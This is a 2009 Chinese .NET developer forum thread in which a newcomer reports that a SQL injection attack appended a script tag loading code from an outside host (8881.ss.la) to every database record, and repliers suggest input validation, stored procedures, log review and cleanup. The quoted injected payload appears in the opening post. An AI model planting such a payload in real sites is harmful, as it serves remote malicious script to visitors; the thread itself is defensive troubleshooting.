跪求!! 网站老是中毒这是为什么啊!我抓狂。大家帮帮忙啊

HelloWorldLookMe 2009-12-04 09:16:34
“~/siteImage/noperson.jpg</title>"><script src=http://8881.ss.la/></script>”不是有效的虚拟路径。

  靠!!数据库里面的数据全被加上了 </title>"><script src=http://8881.ss.la/></script>” 最可恨的是数据全被破坏。。。各位大侠,在下刚毕业的,好不容易找份工作,确老是碰到这种事情。。。 到底怎么解决啊。

  求解决方案!! 

 要是能传授一些如何检查网站漏洞 找出那个黑老子网站的人就太好了。。。 感激不尽 感激不尽啦。。。

  
...全文
371 37 打赏 收藏 转发到动态 举报
写回复
用AI写文章
37 条回复
切换为时间正序
请发表友善的回复…
发表回复
xiangfeng517 2009-12-09
  • 打赏
  • 举报
回复
给我也看一下吧 www.51hsh.com
ff_1211 2009-12-04
  • 打赏
  • 举报
回复
学习。。。
xupeihuagudulei 2009-12-04
  • 打赏
  • 举报
回复
我发的非广告,举报党手下留人。
xupeihuagudulei 2009-12-04
  • 打赏
  • 举报
回复
[Quote=引用 24 楼 kingdomgps 的回复:]
把你网址留下,我免费帮你检测下哪些网页有问题
你自己再去好好修改代码
[/Quote]能否帮我检测检测
www.xsdmw.com
注册失败 2009-12-04
  • 打赏
  • 举报
回复
把你网址留下,我免费帮你检测下哪些网页有问题
你自己再去好好修改代码
hhwei1985 2009-12-04
  • 打赏
  • 举报
回复
up
SDW342422 2009-12-04
  • 打赏
  • 举报
回复
把数据库语句全写成存储过程 并且加上验证
a6711145 2009-12-04
  • 打赏
  • 举报
回复
LZ 网站有没接受客户输入数据的地方?连接是否有URL 传值 等等。
LZ 在与数据库交互的 代码 有否 把客户端的接受来的数据检查过滤?
snihcel 2009-12-04
  • 打赏
  • 举报
回复
楼主,遇到我一样问题,我发几天才把注入的代码从数据清除,
可以批量,大部数据能恢复
http://blog.csdn.net/snihcel/archive/2009/03/10/3975409.aspx
不过,最好要解决注入的问题不能是冶标不冶本
伴老思源 2009-12-04
  • 打赏
  • 举报
回复
1. 检查是否存在 *.aspx?ID= 这种传值方式, 如果有那么在接收页需要对接收的值进行校验.

2. 检查你的页面中是否同时存在js注入的痕迹,如果有请检查服务器中的可疑文件及FTP.

3. 查看事件查看器,检查应用程序的异常情况.



zengp 2009-12-04
  • 打赏
  • 举报
回复
以前帮朋友处理过
wiki14 2009-12-04
  • 打赏
  • 举报
回复
被注入了。

检查程序上的问题吧。多多防范。
伴老思源 2009-12-04
  • 打赏
  • 举报
回复
这只是修复目前的数据~

但并没有从根源上解决问题,仍然是被动的防护~

检查程序的漏洞才是正道~
屌丝女士111 2009-12-04
  • 打赏
  • 举报
回复
这么多注入的啊
wxjianghong 2009-12-04
  • 打赏
  • 举报
回复
和我前端时间一样.我的方法1断网写程序,2,把这连接添加到不信任网站。
harvesthouhao 2009-12-04
  • 打赏
  • 举报
回复
除了SQL注入外,看看服务器是否有上传文件的地方,是否存在漏洞。还有就是服务器是否中毒了
mxc1225 2009-12-04
  • 打赏
  • 举报
回复
HelloWorldLookMe 2009-12-04
  • 打赏
  • 举报
回复
[Quote=引用 6 楼 goalsunboy 的回复:]
看一下网站登录日志,可以查看从哪个地方注入的。
[/Quote]

 呵!!在下菜鸟一个,请问如果查看网站登录日志
惭愧。。。
boaboadjs 2009-12-04
  • 打赏
  • 举报
回复
同感啊 昨天我的网站也被注入了
HelloWorldLookMe 2009-12-04
  • 打赏
  • 举报
回复
[Quote=引用 7 楼 wonderful_lee 的回复:]
把你邮箱留下。
我给你修复的SQL语句。
[/Quote]

谢谢!! xiayu2080@126.com
加载更多回复(16)

62,047

社区成员

发帖
与我相关
我的任务
社区描述
.NET技术交流专区
javascript云原生 企业社区
社区管理员
  • ASP.NET
  • .Net开发者社区
  • R小R
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告

.NET 社区是一个围绕开源 .NET 的开放、热情、创新、包容的技术社区。社区致力于为广大 .NET 爱好者提供一个良好的知识共享、协同互助的 .NET 技术交流环境。我们尊重不同意见,支持健康理性的辩论和互动,反对歧视和攻击。

希望和大家一起共同营造一个活跃、友好的社区氛围。

试试用AI创作助手写篇文章吧